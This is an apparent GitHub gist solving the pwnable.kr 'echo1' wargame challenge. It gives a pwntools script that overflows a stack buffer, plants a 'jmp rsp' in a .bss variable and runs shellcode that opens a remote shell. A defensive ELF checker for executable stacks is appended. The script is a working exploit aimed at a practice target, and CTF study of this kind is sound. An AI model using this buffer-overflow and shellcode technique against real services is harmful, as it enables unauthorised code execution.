@Pascal-0x90
Created March 9, 2021 23:56
Pwnable.kr Solves: echo1
#!/usr/bin/env python3
###################################
# Standard library imports
import sys
# Third-party imports
from pwn import *
# Binary path, given on the command line
BINARY = sys.argv[1]
# Pwntools binary info (64-bit Linux target)
context(os='linux', arch='amd64')
r = ROP(BINARY)   # unused here: no ROP chain is needed (see "Main idea" below)
e = ELF(BINARY)
l = e.libc        # unused here, kept from the exploit template
# Connections and interactions
#p = process(BINARY)
p = remote("pwnable.kr", 9010)
# GDB anyone?
#gdb.attach(p)
#input("Ready to roll?")
###################################
# Junk to fill up buffer
JUNK = b"i"*40
'''
Main idea:
- Since NX is off, we want to try to execute shellcode
- Literally no "jmp rsp" gadget exists in the binary
- Furthermore, I don't want to do complex ROPping
- We can write to:
    - id (in .bss)
    - s (on the stack)
    - o (maybe? it's in the heap though)
- We may be able to overwrite some location we know with:
    - An address
    - Assembly
- The problem is whether that location is executable or not.
'''
# Address of id. Is in BSS
ID = 0x6020A0
# What do we want to put there? #OverwriteTheBSS
jrsp = "jmp rsp"
jmp_rsp = asm(jrsp)
# What shellcode do we want to execute
sc = shellcraft.sh() # Yeah we are kinda basic here
'''
Flow:
1. Overwrite ret with address of jmp instruction
2. jump to shellcode
3. interact with new bash shell!
buffer + addy + shellcode
'''
# Create our payload
pay = JUNK
pay += p64(ID) # p64 since this is a 64 bit binary
pay += asm(sc) # Our shellcode to execute once jumping back to stack
# Check our length of payload
log.info(f"Payload Length: {len(pay)}")
'''
In order to make `id` hold our assembly, we send it as
the first thing the program asks for during execution.
'''
# Recv till ready to read
p.clean()
'''
Important thing to remember here: sometimes which function
we use to send input (i.e., sendline vs send) matters,
since the extra space or newline becomes part of our
input. In this case we are telling the program to jump
to this location, so even if there is some arbitrary value
after the assembly, the jump is taken first and the trailing
bytes are negligible.
'''
# Send in our asm, NUL-padded to 6 bytes (the jump is only 2 bytes long)
p.sendline(jmp_rsp.ljust(6, b"\0"))
# Now send our choice of "echo" type (option 1)
p.sendline(b"1")
# Send in our actual payload
p.sendline(pay)
# Should have a shell now, do interactive to check
p.interactive()
p.clean()
'''
p.sendline("cat echo1")
data = p.recvall(timeout=2)
print(data)
'''
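The "Main idea" block above hinges on one precondition: the binary asks the loader for an executable stack. As an added check that is not part of the gist, here is a small ELF64 program-header reader that reports that property (via PT_GNU_STACK) and lists any segment mapped both writable and executable; the sample images it runs on are constructed inline, and the `build_elf` helper, `NX_OFF_IMAGE` and `NX_ON_IMAGE` names are my own.

```python
# Added example, not from the gist: read the ELF64 program headers and report
# whether the binary requests an executable stack (what "NX is off" means here).
# On x86-64 kernels before Linux 5.8 an executable-stack request also set the
# READ_IMPLIES_EXEC personality flag, so every readable mapping (.bss included)
# became executable, which is what lets a jump into `id` work at all.
import struct

PT_LOAD, PT_GNU_STACK = 1, 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4

def program_headers(data):
    """Yield (p_type, p_flags, p_vaddr) for each program header of a little-endian ELF64 image."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    e_phoff, = struct.unpack_from("<Q", data, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x36)
    for i in range(e_phnum):
        p_type, p_flags, _, p_vaddr = struct.unpack_from("<IIQQ", data, e_phoff + i * e_phentsize)
        yield p_type, p_flags, p_vaddr

def stack_is_executable(data):
    """True/False from PT_GNU_STACK; None when absent (the kernel's arch- and version-specific default applies)."""
    for p_type, p_flags, _ in program_headers(data):
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return None

def wx_segments(data):
    """Virtual addresses of PT_LOAD segments that are both writable and executable."""
    return [vaddr for p_type, p_flags, vaddr in program_headers(data)
            if p_type == PT_LOAD and (p_flags & (PF_W | PF_X)) == (PF_W | PF_X)]

def build_elf(phdrs):
    """Constructed test image: a bare ELF64 header followed by the given (type, flags, vaddr) headers."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8          # ELFCLASS64, little-endian, v1
    header = ident + struct.pack("<HHIQQQIHHHHHH", 2, 0x3E, 1, 0x400000, 64, 0, 0,
                                 64, 56, len(phdrs), 0, 0, 0)      # EXEC, x86-64, phdrs at offset 64
    body = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, v, v, 0, 0, 0x1000) for t, f, v in phdrs)
    return header + body

# Constructed images: one linked with an executable stack, one without.
NX_OFF_IMAGE = build_elf([(PT_LOAD, PF_R | PF_X, 0x400000), (PT_LOAD, PF_R | PF_W, 0x602000),
                          (PT_GNU_STACK, PF_R | PF_W | PF_X, 0)])
NX_ON_IMAGE = build_elf([(PT_LOAD, PF_R | PF_X, 0x400000), (PT_LOAD, PF_R | PF_W, 0x602000),
                         (PT_GNU_STACK, PF_R | PF_W, 0)])

if __name__ == "__main__":
    for name, image in (("nx-off", NX_OFF_IMAGE), ("nx-on", NX_ON_IMAGE)):
        print(name, "executable stack:", stack_is_executable(image), "W+X segments:", wx_segments(image))
```

Run it on a real file with `stack_is_executable(open(path, "rb").read())`; a `False` result means a payload like the one above has nowhere executable to land.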